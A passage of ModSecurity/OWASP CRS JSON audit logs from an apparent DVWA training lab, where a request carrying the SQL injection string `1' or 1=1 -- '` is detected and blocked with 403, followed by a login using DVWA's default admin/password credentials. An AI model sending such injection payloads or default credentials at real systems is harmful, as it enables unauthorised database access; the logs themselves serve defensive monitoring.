\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUU38AAQEAABwQSCkAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: 1' or 1=1 -- '\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUU38AAQEAABwQSCkAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: 1' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUU38AAQEAABwQSCkAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUU38AAQEAABwQSCkAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUU38AAQEAABwQSCkAAAAD\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":556,"p2":3522,"p3":0,"p4":0,"p5":3047,"sr":25,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:41 --0400","transaction_id":"WRdUVX8AAQEAABwQSCoAAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=1%27+or+1%3D1+--+%27&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: 1' or 1=1 -- '\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: 1' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUVX8AAQEAABwQSCoAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: 1' or 1=1 -- '\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUVX8AAQEAABwQSCoAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: 1' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUVX8AAQEAABwQSCoAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUVX8AAQEAABwQSCoAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUVX8AAQEAABwQSCoAAAAD\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":466,"p2":3121,"p3":0,"p4":0,"p5":188,"sr":16,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:44 --0400","transaction_id":"WRdUWH8AAQEAABwQSCsAAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":302,"headers":{"Expires":"Thu, 19 Nov 1981 08:52:00 GMT","Cache-Control":"no-store, no-cache, must-revalidate, post-check=0, pre-check=0","Pragma":"no-cache","Location":"../../login.php","Content-Length":"0","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=UTF-8"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUWH8AAQEAABwQSCsAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":424,"p2":1804,"p3":113,"p4":240,"p5":94,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:44 --0400","transaction_id":"WRdUWH8AAQEAABwQSCwAAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":302,"headers":{"Expires":"Thu, 19 Nov 1981 08:52:00 GMT","Cache-Control":"no-store, no-cache, must-revalidate, post-check=0, pre-check=0","Pragma":"no-cache","Location":"../../login.php","Content-Length":"0","Keep-Alive":"timeout=5, max=96","Connection":"Keep-Alive","Content-Type":"text/html; charset=UTF-8"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUWH8AAQEAABwQSCwAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":426,"p2":1482,"p3":57,"p4":147,"p5":79,"sr":19,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:44 --0400","transaction_id":"WRdUWH8AAQEAABwQSC0AAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/login.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"700","Keep-Alive":"timeout=5, max=95","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/login.php\"] [unique_id \"WRdUWH8AAQEAABwQSC0AAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":591,"p2":1781,"p3":120,"p4":440,"p5":92,"sr":22,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:46 --0400","transaction_id":"WRdUWn8AAQEAABwQSC4AAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/login.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/login.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"88"},"body":["username=admin&password=password&Login=Login&user_token=d0d07c67e4897ee73431149640762432"]},"response":{"protocol":"HTTP/1.1","status":302,"headers":{"Expires":"Thu, 19 Nov 1981 08:52:00 GMT","Cache-Control":"no-store, no-cache, must-revalidate, post-check=0, pre-check=0","Pragma":"no-cache","Location":"index.php","Content-Length":"0","Keep-Alive":"timeout=5, max=94","Connection":"Keep-Alive","Content-Type":"text/html; charset=UTF-8"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/login.php\"] [unique_id \"WRdUWn8AAQEAABwQSC4AAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":526,"p2":3096,"p3":110,"p4":161,"p5":82,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:46 --0400","transaction_id":"WRdUWn8AAQEAABwQSC8AAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/index.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/login.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"2725","Keep-Alive":"timeout=5, 